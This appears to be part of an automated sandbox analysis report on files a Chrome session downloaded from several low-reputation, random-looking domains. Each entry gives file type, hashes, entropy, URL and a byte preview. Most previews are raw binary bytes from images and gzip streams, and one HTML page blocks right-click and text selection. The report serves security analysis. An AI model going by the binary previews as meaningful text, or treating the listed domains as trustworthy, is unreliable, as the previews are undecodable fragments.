                                          SHA-256:D0A797B912D0D784F4B0A99DB6158A1420020214C2C02DD0C854E0DBA7ADB803
                                          SHA-512:B603BF59F302F6B4D416D27A3EBE16A31AB1973A93EEB57CB4267BE149E0FCC3A330C070DA15D5EB2D6037D9CB700C4D17B3DC8BD5E331A762AC9D22C3060AEA
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/bootstrap-dialog/bootstrap-dialog.css
                                          Preview:..............0.._..j...TP.U.Zi^......%ag..w......3W..|...Y.D.y.-.....!......CI6<...i.<. .s...(&!.U=.........k9p.d..J.B.k5.9..F.R.?...g.?e..z..H..7>-;..0.d..l.._my.$.kr...$.aJ..|.....6....B-p...C.Z..>.. _..v.}..'../+.k....;.B.[B.D.....VK._Jz.d..V2!.t..........._D<6P.es.4....J..9.h-.;..f_r.......E........5h........lE.L%."D.v.66.....+"g'3...Nx..,.:*r!...|^|.Z4C.2...L...M.........s*..3I.<.."s1..6.;.^Y.......x..4N.mrK..|.>.^Oa.....aL......yH....blz...'..E;....._...G.y._we..o...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (673)
                                          Category:downloaded
                                          Size (bytes):59450
                                          Entropy (8bit):5.5817630703190995
                                          Encrypted:false
                                          SSDEEP:384:DpwAOKkIjsrmbLoEnQTOYb1wI1u4FQZ58xzU8DIKIENpfr6YiVn4IjhliVUbWi7Y:FwokIjm8oJDWCjWli+c8KxOKkKL9V
                                          MD5:70E7326A1132B730F1B6EB8152CE6E65
                                          SHA1:0CCF4268B13B7AC2D46E73DDB3E7FE26A0DB656D
                                          SHA-256:37EB2837CEDEE205F614F189D56F49F401AF8BF92C1C6D5CCBB3AB894D852922
                                          SHA-512:33254E2A59C44798C83A1E5FE0B00F2E8325C779A75763BF140EA7BE20B3F48374853A3FEBAE49C22733D89C09816121F811D7D1D00661BBE011BAB6123254D6
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/
                                          Preview:<html>..<head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">...<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">...<title id="titlename">....</title>...<meta content="" name="keywords">...<meta content="" name="description">...<link rel="stylesheet" type="text/css" href="/css/style.css" />...<link rel="stylesheet" href="/css/modalStyles.css">...<link rel="stylesheet" href="/css/bootstrap.min.css">. <script src="/jquery.min.js"></script>. <script src="/popper.min.js"></script>. <script src="/bootstrap.min.js"></script>. <script src="/banner.js"></script>. . .........-->.. <script>. document.addEventListener('contextmenu', function(event) {. event.preventDefault();. });. document.addEventListener('selectstart', function(event) {. event.preventDefault();. });. </script>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1200x376, components 3
                                          Category:downloaded
                                          Size (bytes):274578
                                          Entropy (8bit):7.972269201317617
                                          Encrypted:false
                                          SSDEEP:6144:MNGwbjlVFPbsW0XEv7mjRmvtaAXztl5OJlvENbbpiHLHmZxfrnCEQ:MNLhNmjR9AFKl+b2HmHuEQ
                                          MD5:9C328E2D11DBF504567BA31B7D9F92E1
                                          SHA1:C5A366C5830FF0C681666C898CD610041286E376
                                          SHA-256:E3C3FE56D1C0D8531F03929E8450C0CC1208EDF0DF4E38AEC6F02E7C843B9CA5
                                          SHA-512:5C88EF89ECEE8128E77D430E029012B729D56746F527CD9990C59D85A6361FFE6723D979461A95F2E02EB08554FC3E81D44E1180FD921B470AF341A21CA7C312
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-1.jpg
                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................x...............................................Q..........................!.1.."A.2Qa.#Bq.R..$3..b..%4CSr.......&D.cs....57.Td..................................A........................!1..AQ"aq.2.........#BR..3b.r$CS..4................?..1.Gqd......o.8.r.>./E.Kj..._..3.1Z..Jo..s..3....5&k+.SR..(...yJ.+D..q....;T..K0..TZ<n........&.m...5.n.KW..".)./e..ZB..e..I..S..k?..E....d+B..~x.......I.~.....We+/I....&...F(J.=...09j..u_}B`.j.c....\....-.^XU....mG*y........D.T. `....Y.7).{...k..(nS..L......b.Q.0..N...........|k....J....s....k..1.D."F_6y.V6&;u....N..k.... .%G..W.z......7.k...P...>...u^x......~...M4e.....j.sSmCscyn\bO..F....u".1.Z@ET.?][.w.!.!&.@^.?E.1.!.....<..p.b.c..;....e..$O..1A,....I0H..t..j..TT..]...M...ye....j.5l("h..S:.IJ.#.y".68...]+..=...@....>..U.....E..zD...+1.=....L=Z.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12153
                                          Category:dropped
                                          Size (bytes):2731
                                          Entropy (8bit):7.935425083385799
                                          Encrypted:false
                                          SSDEEP:48:XKBFUzan/aZ3cwbqL3hEqraljeG96pxGShVxr72jKCtLms9hU2oMuIc+lkbn6uB0:atMbqLaqrCMlCjrzhU2s4An6upmBgE
                                          MD5:9BB052DF29A425481155415B4FE8BBB2
                                          SHA1:4BAE89F2F3EFFD7415DC0A9115D11D9EA007316A
                                          SHA-256:63D1D3F6D761F93B6BDA95E6BF3819F00C329905DBC4D6D2F7996499CCFF3986
                                          SHA-512:E06989B71F548E260F88FB0B0D6FCF077D4F95F4EB2E622971C79DCA9391B4B19D53AC0613B095B6FFF5FC38FD253C365F5CDC1BF899BC93931686618A398413
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........Zo..H....b.......r...wW.-.k./..y.I....i.....I.C.z.^!q..D......iz.-x...=v...n{..Q.uf........pn.\ ..O..>.%.v.7<...a:."2`..H..E..I0v.4..8.m.Oy0..by.r..{m.R....Zp.%7.4f..I...F..I....1....M...=$!d$D..8...f1...{.f|.h....bW...Q....m..2bc.+.07.i..A....N.(...B.4..)O...Kv...r..F.-.!w]`9..D...k....1n...jGlbu.C..z..N.............W.&........O~...?..7".8.q...Q...l(......... .7..`.{H...X-...V.C...l...L.?.x.........=....G..?........o..?....?>../......xn.Q6.d(f.Q.3..V.N..]..HX.....Z.......8NF6#.?..GuZY..............@..gS....P].....g.?}.._.,..L..".mmY.4.....3&.d.z0s.vD.`@,1.)..z/f\$d......Fe+#.6f~.R;'.$00l..@.. ....xi......}s..k.......J\..d)se=7[.N..0d'nH.!#..p..E.... ...=.".M.{.j..)..9.+.R.).<.]....m"{Y .C1.. .x,J.Nr.Pj...VN..GZ.+.]xlu..A5..U............!E]..eec...#Q...k....&..{...q..X...J+.pA..@.Q>.DL...m.8%.....KE............d.....1...c!u..:..%..."xJ..g.$.-X.S/.]...d..h#7<.`^...d..!7G9.D0. ....l:.....I.}.I.&D9.2...D.(..p.zO.H.{...y#..fD
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 3593x1400, components 3
                                          Category:dropped
                                          Size (bytes):296412
                                          Entropy (8bit):7.931124631952406
                                          Encrypted:false
                                          SSDEEP:6144:jsw/ojc+qPxyYKTsbcGPp5iD8PRCb2otJdY0b0raG0idjHlaDfBW:pQjc+qPlxS8PREFtEnDblIo
                                          MD5:ACC29E2A810DBB1885ED42BCCFCC3DDF
                                          SHA1:16175006F7ECBE64FEC2BF622188680E9620E525
                                          SHA-256:40A9EF15524032293E0F19486DD17456585762F1FCE3BA47349CB2E79E2D56E5
                                          SHA-512:32FF9CFCE71411FF45F847F19D4F21111E4DB8A058D9440DE2483D3F228C033C3D5AE14AF05A45DB93E1BF1D017B479D74F989E8A11AAE3F3E72BF5DEE87988A
                                          Malicious:false
                                          Reputation:low
                                          Preview:......JFIF.............C...........................".##!. %*5-%'2( .?/279<<<$-BFA:F5;<9...C...........9& &99999999999999999999999999999999999999999999999999......x.........................................................................................@..T......T...T.:..`.X..V.....B..M................. D.X...e...e.............(..............*.....@.................D....P......Y@.@....R.....P...U........!...!.t.".........I .......P.....h..@..@ P......$.QTP...PI11[b.[+A@.I..`...............)M..%Y%@...L.U"Q6.J.aQ..........................@..L.......X........"...@...( .($..... ..X...,.........*...... "t.D N...B.......[.@........YEP........".:....4.............$.............B...(A....."-A.%Ye..%YX...).d-..$..V.....$..*............D.l.*N.T.-lb..PR..DJ........"..........M"......&P.......h........................U.................b..*.P..DM............@.l....*..Y..@......+ .............................:..P.(.@ P...L.H...%I+T...X.A2....ex....DEX..`....*.......jR....M....DI+\.".+J..PE"e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 192 x 180, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):21808
                                          Entropy (8bit):7.965220787615533
                                          Encrypted:false
                                          SSDEEP:384:RLAQ6vBzj2oCaGhj0jFwYjYPLPiLNUookpzAltXNhJtQTRgpa0LBH3pf:RNAB/BbG4jdsD6LskpzAlvtQtX0Lx3pf
                                          MD5:C83EED0DF1357AA7A2DF0686EEF73598
                                          SHA1:B175DC79CAB26C5616A83CA5954865B2285E9C73
                                          SHA-256:F9335A2D909DA756905E552DFC2AE98A06001CF6EE1548F79BCDFE6446B3EF1A
                                          SHA-512:CE53ACEF2474AD18BF97722952E9275B900B415E37B80F82FE362F89E3D53DEC5F94261B9F6FC4F870CD1EBC5497422B0E2B2C31C4C728672C94BC29A848D49C
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR.....................PLTE........$....9@.9@.....$.......7=.."..........<D.-6.)2.07....7?....?F.."....5>.:B..".#(....2<.18.@J...........$....8A.%-.!).......(..!$..&.............AH."(.....6....2;.-4.'.."#.... ).)2..5./9....#,.BK.-1.(.....8A.*6..&....%*..".(+.(2.<C....#,.....#..........$-........)..&..........gW.PG.ZL........IB.3=.,(." .p.0/.. .YO.*%......RF.\S.NB.E>.1'....iX.?<.37....")..........ED.G:.....g.! .....70.......w.z`.cP......q].=7....bM.10..r.XF.N=.:3.<9..&.....x..$.~i.w.dD.......:)...#...z..o.oJ.}[.Y..9.....OL......uZ.Q5.6!.E/...r\.79.%-.+..$...1....m.[....{d.~.e....f.a.......s.[>...p.cP....dA.....x.kW.o.tK..#.}..{.c.B7.D4..h......z.g].....P.....O..,....w.l.se.a..l...v.Y9.O0.....g.pH...d.B(...p...R.#..{.\~WcZ....tRNS..)...X..J.}g..Q.IDATx..mHku..{.Rh;X..F...xfT.2]..-..!....{p.<..k.`./8.v....-.^...iV.3.^\.....z.U0.......9....=|=..L.|?..........>.......v.>.n6..U..(..N.8>;;.V.{@S.T*..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                          Category:dropped
                                          Size (bytes):6871
                                          Entropy (8bit):7.872376472792791
                                          Encrypted:false
                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                          Malicious:false
                                          Reputation:low
                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (1739), with no line terminators
                                          Category:dropped
                                          Size (bytes):1739
                                          Entropy (8bit):5.12931572726008
                                          Encrypted:false
                                          SSDEEP:24:2AubZJgEHjkGCUL39eegdXF3+gDCRb8xW2VvgTf8pxmMXNE8ELqmtMHAq0DkNdmz:obnCUcewXzITf8nm2zNYD+NXaXd
                                          MD5:D97B3811C0F31306290B9C51840901F3
                                          SHA1:A3326BAEBE4C1CB5B94582F5DB7CDB8F1DCB61AF
                                          SHA-256:7A90E6849E5320B44BA8D8D492B9A1830F3C1E5DBFEB389F21AC603588D25877
                                          SHA-512:277E3E63FDEE3CAC33418B141330A80B16FBB77B03A957E2CDDD228D54AA6D00902580ACE84F7689C83704969234B74CF5ED2E8895FB4F7DBC67CBF4A45AB29A
                                          Malicious:false
                                          Reputation:low
                                          Preview:(function(global,doc,testGlobalVar){define(["curl/_privileged"],function(priv){var hasAsyncFalse,loadScript,dontAddExtRx;hasAsyncFalse=doc&&doc.createElement("script").async==true;loadScript=priv.core.loadScript;dontAddExtRx=/\?|\.js\b/;return{load:function(resId,require,callback,cfg){var exports,factory,deps,dontAddFileExt,url,options,countdown;exports=cfg.exports||cfg.exports;factory=cfg.factory||cfg.factory;if(!exports&&!factory){throw new Error("`exports` or `factory` required for legacy: "+resId)}deps=[].concat(cfg.requires||cfg.requires||[]);dontAddFileExt=cfg.dontAddFileExt||cfg.dontAddFileExt;dontAddFileExt=dontAddFileExt?new RegExp(dontAddFileExt):dontAddExtRx;url=require.toUrl(resId);if(!dontAddFileExt.test(url)){url=nameWithExt(url,"js")}options={url:url,order:true,mimetype:hasAsyncFalse||!deps.length?"":"text/cache"};if(deps.length){countdown=2;getDeps();load()}else{countdown=1;load()}function getDeps(){require(deps,hasAsyncFalse?_export:reload,reject)}function load(){loadS
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1200 x 400, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):40362
                                          Entropy (8bit):7.982468223427335
                                          Encrypted:false
                                          SSDEEP:768:L+hhTB9EEiY7pwXiDPy2QreNtKVNs3uUJKJysdKuBQMtmUqGmDYyxLfv:8tXiocwq25tKVNseU4Jy65DdmDVfv
                                          MD5:E8756F5A60A8553B7D9B26851BEBFA7D
                                          SHA1:09D5262BBBDFEC24E88B8FABA8A00E6B80B8E831
                                          SHA-256:5462953296CDF1F3EC26A1BDA5E1C1212FD09A07494B61BBA542100767600686
                                          SHA-512:BF8213ABC8E70852A572787AFD5BDA54EA525315D341410683A1C31A149AD787CD5E818338110DBC5DE1B17187C965D7B761201C75F3466E9D02601383943A74
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/gf.fc8d6758.png
                                          Preview:.PNG........IHDR..............kil....PLTE....*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.*|.ub.tb.ub.ra.ub.ub.vc.ua.iZ.s_.ub.vb.uc.ub.vc.ta.uc.uc.p^.sa.r`.|h.^N.OB..o..y....*|.ub.kW.^H....}k..#.ZC.wd.vc.aK.dO.ta.mY.o[.q^.fQ.hS.s_.iT........._..:.~.yf.U>....xf3.yT...n[Z..*.s...}..C.....f..............x.....P.....lg...#.o.O7...............cl...........{i...r..........rd...l..... .mI...s_......%.q..........>..n...iiu............F..6.{.an.tc...h.......w.fk..... L...pe.zg..$%.\z.E/.t).n6.X.H/K...y`..".nf`.M..7N.Q..9,.Z..,..l....\qC.T..@..*...n.I..'..'..2..2..>.A'..#s.........)tRNS.w."D..f..3.U...F.....+...[Rb..8xl..P.%.[.....IDATx...[O.A...~...Zl.R..d..twvv..u..i.....Hm.R*....`.IM$...L..Z/.lmKU....e7.d..9s2...B..{.....'$..'..^...K@....D82.t.....!..._w.._...H\../.C.1..B..qO^.K...!.,..M...!t...#R.E/.+ E....!t...)....+E.8k!...;8.s.K..M.....j.X.!L.0t....a.B..u.'-.._.....J.:.k..9.3..J..hD..F......s..Z..)....v.#..........(.3..k...;.....'...........[G...........B'.........y
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):5376
                                          Entropy (8bit):7.928626781930389
                                          Encrypted:false
                                          SSDEEP:96:h6DejFCEN1cN7wKzMpHQEIMoORLxmTz3dORfdmysQ65tYHrPq:h6ejFBN1c1wMoH3IMPRLIEsysQ6TF
                                          MD5:2BC1BF08144630D93B1CFAA5FE79A23C
                                          SHA1:1DF219CB9BC37B20E9C14203234A7353C0DE2B5E
                                          SHA-256:2C3818B06418DB8DC6BBE87D667087BDE5D151C24211E9E08911370C1174276F
                                          SHA-512:CD49BA8DA50F8BBAF759C8958AA45F69BC0CB9790D0731F530402936D375CD4100322A2E635A14D28B904DB7454C974303D0E6FDE49E3EEF56B87CC5636BD88D
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR..............2.....OPLTE.............................................................................................$$$........................-%.222..........w..........**+......u_.3(.....^^^...................8-....NMN...............//0..........wqoVF......[PG.......ddd....}..................FEEN?............ZZZ..==>.........~{ziiiVVVAAA:99........IIJ...........~~~ppqnhee\U.....$.............ttvsmkjc_PPQ`VP....................666)#............G9.+!................G?7.)$...............yyy{ursrrSRS....s.yb.fS.A4..........~~......z..n.^L.mmmSIA...p[..i.TD....oe^A815/*........naX......w?......tRNS.....~`V1.....F......NIDATx...W..0..P.. .Z...u..[.,.1...h4c.|.l0=..`].q.7..44..ze..:.H7.ps...a.LD.r..,...[}%.)c.4g..]d.7..H1q...W...{M95...%<L.4....X...@CI..B....x..h).U.a_....;.@Q.r....z,..\..]..].o....0...8uu...j.t0 H.4tk P..8..nv. t).k.....3.0w?.7..a...#:..1.c...#:..1.c...#:..'Mt.j7...u...I.FD...,.b..2..{zdH....s..\....v..^...n...5+
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7899
                                          Category:downloaded
                                          Size (bytes):1404
                                          Entropy (8bit):7.832290418196049
                                          Encrypted:false
                                          SSDEEP:24:XpgFNEV4e+6WspJq030nnipPzMwCpfPWDyWlOzLFofXvSqwXMdCs4g/OX:XmFNEVFWs/q031xAwCNWGJLFonSCw3X
                                          MD5:8ED7F53E3C4D7AFBBE4CDDCDFF920262
                                          SHA1:9F7D5D268200DC26F4A658CFB135A51A98061780
                                          SHA-256:78555A142760655FC81FFB96CEEBE5F57E24B0FA94A34B009145C364971AEE0A
                                          SHA-512:5A29AB343B44CE11375B18745E413D352582F10F9FEFD1BE6238D2738059821B60C986E8E81995A6688F23D64C779B18873BA211E174E4DD7B3B8568510C0657
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/main.js
                                          Preview:...........Ymo.6..-.......:....dk..qS...Zb$.4..T.;.....%..#c....{...y.H9.R.....<K.8.b.W.9....!.QB....$....W.....K.a1~.D.........O..u.........gg.pvO....+TW+.m.|..'2.+.'...<_.}..P...m(....(..i.5...........N.cG?}.p..N.Sg4.+!S.....W5gTK. .#g.%.0..41...S!..=...#.a.$V..6[....DI........lN_...g.Y..)V..h_K....|BI2.(....D........T......._...(.Dd..9..!.9.:q)G!N..%>......?'<.b....3.r4-...!#.c.o.HCV.B.P..$P.}..\. ..7..e......Bi..\.JaR..I...e.[...k....VX....l..T.-.`v...A.3" .[....nK..E.gd...&..8.T.mlp.....I.d.3...n..S..;..O...N..p'?/G...X.0,$.S..L.l...Q.^9.....*..z5.C...V..QzP*o...!mn.n*..M]......W..2.....5|tgS...W&.....lRO....;.....Ii'..h..|...(.>.cml...1..'.K..l.....QD....{l...g.m`....I.....`.3...E8)..E8!....Xg.:ji.3o.....].....K8.}....SU....W.....q.....98&..hY<K...O.A.y.s.....N...0sg.N..f.Wj]..Cu.=l@..h...+;#........2.....-.{ycg..<..G.~.5....-...g;#....IH...Z..bD.{qfg..<.....=y..<..D....R..X..p?}..s....hr..hr..c1..{vng........^.p?9..[....i|.R....$I.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 53129
                                          Category:downloaded
                                          Size (bytes):11735
                                          Entropy (8bit):7.9828879074241135
                                          Encrypted:false
                                          SSDEEP:192:b5ks69iM4x3/f3yg+msOUtdTeklUwMawF5T5SKa6Y78UBJutSdq+iRPOuRjko:b5aiNx3ig+msFlUpT5SKa69USt4qrjko
                                          MD5:0F78991D7D4F9CDF92DE3A719D156EEC
                                          SHA1:11F84E648C4CBBFBC105E9A52835DF759FD21A1E
                                          SHA-256:1FF29532EE3A054DA00A22A420CAC36B73CB43236C090A0A40E18CA75EF76858
                                          SHA-512:7C0843264E86974FF642F13481344AF1F87B9D552AD9BED04DA9A2D3F270A93F28E4F3DD5D69E7AC8C62DC5EFF66F4A67E5D3705CF0683287DD9DA414E905AA7
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/content.css
                                          Preview:...........}io..._.{0.i[..:$<a.o?x?.......h.x...*..n...wF....,.....F"3#..3..C1...}.LM..p.....n.u...K..x.=...59.c;..).6..sQU...v...#.#...S.....0.....}Q~y......._..=..c1<.......q........J..SY.."...Y...4.c.\....Y..K...o.c.=...om9.c.L..*.K...]$....@e#.........x............V..+U....rA.7JN..}1.d{,:..Kh.|Hj&..G.,.`..-..@{A W~..\..*(..w}...O.5.+3=hy9r...z..b_wI..$..&..zM.S.....=..c.gh.<5...4.G9...T<..vz..X.N.V.}?T...fl..k..z....%..j....s....A.tC.N..~..2.....0.............E.g(..2.]...=tG.....O..8=hDl.E...R..3......-3.nh.z.....0:.....K,....)f..p.-..T....2r&...T.`..54E.w.....P....*.Li.c...W.........<.Eg..:%..M.?..q.@............9=.X.%.H+M.M.w.g.....en7.....-,[..0...lj.q3.V.3..i.,K...&......WZ.#xM..y.2Z...u.E......1p...._..s....}...b;m._......}.=.UU...B1nP.L... ...Ww]{..Q..z...d.....y...../.(..+'f....fk.m..`{.3....~.4...C.j..+.V@W....^Q..^...B.......E...#..x..g{..).......p...,.J...P.....a.h......3.a.%V..........SH2..u...qh.p(5.......l
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 235 x 70, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1377
                                          Entropy (8bit):6.884886058578742
                                          Encrypted:false
                                          SSDEEP:24:ry1hiyWwh82lYSgXcVqjT3ouyJ3VzIw5GaG+iEdsovcnOTa3/ymD3rB1:rwuvn3cEjIJ3bnrF0qQ/yerB1
                                          MD5:5F356AE215DC672F258540F2C3459645
                                          SHA1:B1BA4B9448C42761AB3C8726B9655611BE0B3BB5
                                          SHA-256:BC24D6861DD031FE44E2B129FC711281E0520BB6C4A678DFF58CB43FD7EE94A3
                                          SHA-512:0EE759E47D21A1183B89912772A58B7D5F9AAFD8BB2A80CD7AA30BA5EEA400B07EFEC4ACC7E1FD14BFF3723EB937FB5485A94463DE4AFD9FCC04235C85262095
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR.......F.....-.c.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:C475E6DAC91611E7B32AA2C46D9905B2" xmpMM:InstanceID="xmp.iid:C475E6D9C91611E7B32AA2C46D9905B2" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F2618EECF8111E29588CBB348727F5A" stRef:documentID="xmp.did:2F2618EFCF8111E29588CBB348727F5A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.4......IDATx...1N.0.@.d.7..9{..3...E.........7k.m.{...p.$X%.*.*.VI.J.J.U.....`.....$X%.*.*.VI.JEz=.......|......<.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 440 x 140, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):2950
                                          Entropy (8bit):7.868804141565523
                                          Encrypted:false
                                          SSDEEP:48:SABafCd6RLhrdyu4xGo5mGAYhLLvic7+nr3Vnk8+kkBC7zK2nO0EOoNZQ7:6LLhr1do8mLL6Q+rO8+kkBCVoOoNZy
                                          MD5:31DE1D2FA7D918FAB2F59984391DB1C8
                                          SHA1:4F4B78796B3FBF19971F182175BCD92B01EE470F
                                          SHA-256:29F87D6615F36A54E3EDC8C7F05EB9B480D1F2989DEC8DA68E82747D060AEA85
                                          SHA-512:6FCBE53CD766C7A8C9A866BE753F6F58A7BC65B9AD5A0FD05057AE716C51B180F824726CFB1E47A5420B64CFCE812778D3DD33BBCCDA06378B2F972E83CAB950
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.sogou.com/web/index/images/logo_440x140.v.4.png
                                          Preview:.PNG........IHDR.............9.L.....gAMA......a.....sRGB........{PLTEGpLSVYSVYSVYSVYSVY.u.SVY.c8SVY.s.SVYSVYSVYSVYSVYSVY.w..p..r..."..&.e..f.SVY.b..b..l...(..&SVY.i..o...-.| .v...$.c..V...'.]..X.?....tRNS..L......<]~.f.*.qI0..............IDATx...z.J...}..M@......Co..`..I.....3O.Vwm8......@ .....@ .....@ .....@ .....@ .....@ .....@ .....@..H1..9.W)8_B...lA~x...._...._.k.......<.......U.(..+.t_*c.[......l.7I...+.(.C#:C....v1.v.y......WI.O..P..ygD.(.E......b..1.F......}....Q.1......_..~0....p.....q.f.l?....B....[:{(X{.....*.....=..y...EY.e..2...#....=.......S.........p4..,.....-.9..V_K...c....V...W..Z.-.......O.-.9.K..OY.r*.\f_K..)..."v.t...N\.2.....4...}.....".&..R3..._V..$...D..[....e......<...S..^.. 8./ah..7....7aX.o....."I...<M..KN...<}.........'.a..RIA..M1./.[..L.....,....lC..$............2lJ$..a+...W.T........w.:!p._.....t....(..?7..;..`.P..HH.....u^..KQ.p.0.N=}../...n);.......!.$$1n...}dX..(....0HpY....CJ.c...}...., ...........{%..Oj...b........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):9569
                                          Entropy (8bit):7.911159762700345
                                          Encrypted:false
                                          SSDEEP:192:kIIHUCD4wa3SC8Bhl/YqBIk2r1RP7XGV0Vymv8:a0wDC8BHfS97XGVgyj
                                          MD5:53B87F1287AA9B3C090F6DFD5427E547
                                          SHA1:D85E80C33F30E528BA36D8151988AC2028A981E2
                                          SHA-256:5E4EA287A036C9C535574693C5B37FC29BA4B2D3797B77C5AF4B06CD7AC0EEFD
                                          SHA-512:AE3ACD3A8BF8269E575853F87265D55A7CC189D1DA170020ACFECF44E4E8896902CAE62CC0A722E8D0FDD808FF5C855C272D44F98AC5F94753EC5DD6513B61DD
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR...............Z=....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
